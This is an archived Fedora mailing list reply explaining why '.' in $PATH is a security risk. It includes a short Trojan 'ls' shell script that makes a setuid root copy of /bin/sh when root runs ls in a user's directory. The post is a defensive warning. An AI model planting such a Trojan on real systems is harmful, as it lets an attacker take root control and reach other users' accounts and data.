Re: Stoopid script failure

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



On Sat, 2010-02-06 at 23:24 +0800, Ed Greshko wrote:
>  have . in your
> $PATH.  I recall somewhere, sometime a warning against that....but I've
> ignored it for years and haven't had a problem.  I even forgot what the
> warning was all about.

Generally it's not a good thing to have a different command be executed
depending on what directory you happen to be in when executing it. That
is at best unreliable, and at worst a major security hole. This is
particularly bad for root; consider this:

$ cat > ls
#!/bin/sh
cp /bin/sh .
chmod 04755 sh
/bin/ls $*
^D

Now if you can just trick that sysadmin with . in root's search path
into inspecting your home directory...

# cd ~user
# ls

Now the user has an executable setuid root shell.


Or trick any user with . in the search path into doing it and you can
break into their account, find that nice juicy saved banking password...

--Greg


-- 
users mailing list
users@xxxxxxxxxxxxxxxxxxxxxxx
To unsubscribe or change subscription options:
https://admin.fedoraproject.org/mailman/listinfo/users
Guidelines: http://fedoraproject.org/wiki/Communicate/MailingListGuidelines

[Index of Archives]     [Current Fedora Users]     [Fedora Desktop]     [Fedora SELinux]     [Yosemite News]     [Yosemite Photos]     [KDE Users]     [Fedora Tools]     [Fedora Docs]

  Powered by Linux